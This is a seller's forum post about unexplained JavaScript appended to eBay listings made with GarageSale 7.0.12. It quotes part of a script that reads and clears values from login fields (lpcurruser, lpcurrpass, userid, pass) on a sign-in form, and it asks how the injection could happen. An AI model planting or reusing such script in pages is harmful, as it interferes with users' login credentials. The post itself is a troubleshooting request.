I’m finding the the linked script being appended to (what appears to be) any listing uploaded from Garagesale. I do use a custom template, but I’ve scoured my custom template template and nothing like this is in there. The final lines of my custom template are these:
<!-- :::::::::::::::::::::::::::::::::::: item description starts here :::::::::::::::::::::::::::::::::::::::: -->
[[description]]
<!-- :::::::::::::::::::::::::::::::::::: item description ends here :::::::::::::::::::::::::::::::::::::::::: -->
[[call drawDescriptionFrameEnd]]
</div></td>
</tr></tbody></table>
[[call drawLowerPart]]</div>[[endif]]
<!-- Code and Design: iwascoding GmbH -->
<!-- Exclusively for GarageSale. This code may not be used or modified unless you own a license for GarageSale. -->
But when I look through the ebay site single listing web editor and click over to the HTML view, at the bottom of the HTML code, appended to GarageSale’s liscensing/version info is the following script tag and JS script:
<!-- Code and Design: iwascoding GmbH -->
<!-- Exclusively for GarageSale. This code may not be used or modified unless you own a license for GarageSale. --><div style="position: absolute !important; top: -5px; width: 1px; height: 1px; overflow: hidden !important; font-size: 1px !important; line-height: 1px !important;"> _gsrx_vers_823 (GS 7.0.12 (823))</div><script>try{(function() {if (typeof(lpcurruser) == 'undefined') lpcurruser = ''; if (document.getElementById('lpcurruserelt') && document.getElementById('lpcurruserelt').value != '') { lpcurruser = document.getElementById('lpcurruserelt').value; document.getElementById('lpcurruserelt').value = ''; } if (typeof(lpcurrpass) == 'undefined') lpcurrpass=''; if (document.getElementById('lpcurrpasselt') && document.getElementById('lpcurrpasselt').value != '') { lpcurrpass = document.getElementById('lpcurrpasselt').value; document.getElementById('lpcurrpasselt').value = ''; } var lploc=1;var lponlyfill=1;(function() {
var doc = document;
var frm = doc.getElementById('SignInForm');
var old_username = doc.getElementById('userid');
var old_password = doc.getElementById('pass');
var runids = doc.getElementsByName('runId2');
(As can be told from the code, I’m using GS version 7.0.12)
I’ve truncated the code, as it goes on for about 30-35 lines. You can find the full snippet at this pastebin link.
I do not at all think this is coming from GarageSale, and, frankly, ebay’s active content neutering has been invaluable here, because it looks like this code is attempted to change login fields of …something to empty values.
But I would like a sanity check from GarageSale that this, for sure, is unrelated to them. Also, if possible, any suggestions for what I should go about checking. What would have access to inject code like this into my listings? Third party apps? Some man in the middle thing between GarageSale and eBay (…that’s unlikely, but okay)? What freaks me out is
a) I uploaded a listing yesterday that I’m seeing this code inside, and the last time I explicitely used a third party app to do something explicitly was months ago
b) I wouldn’t be surprised if ebay is penalizing my listings in search rankings because of this. Hell, I only know because I checked the HTML side after seeing a warning about active content from ebay’s site.
